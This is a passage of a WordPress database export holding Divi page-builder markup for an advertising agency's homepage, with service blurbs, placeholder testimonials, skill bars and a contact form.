percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\" hover_enabled=\"0\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:33:51','2020-07-09 20:33:51','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(296,1,'2020-07-09 20:39:13','2020-07-09 20:39:13','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" 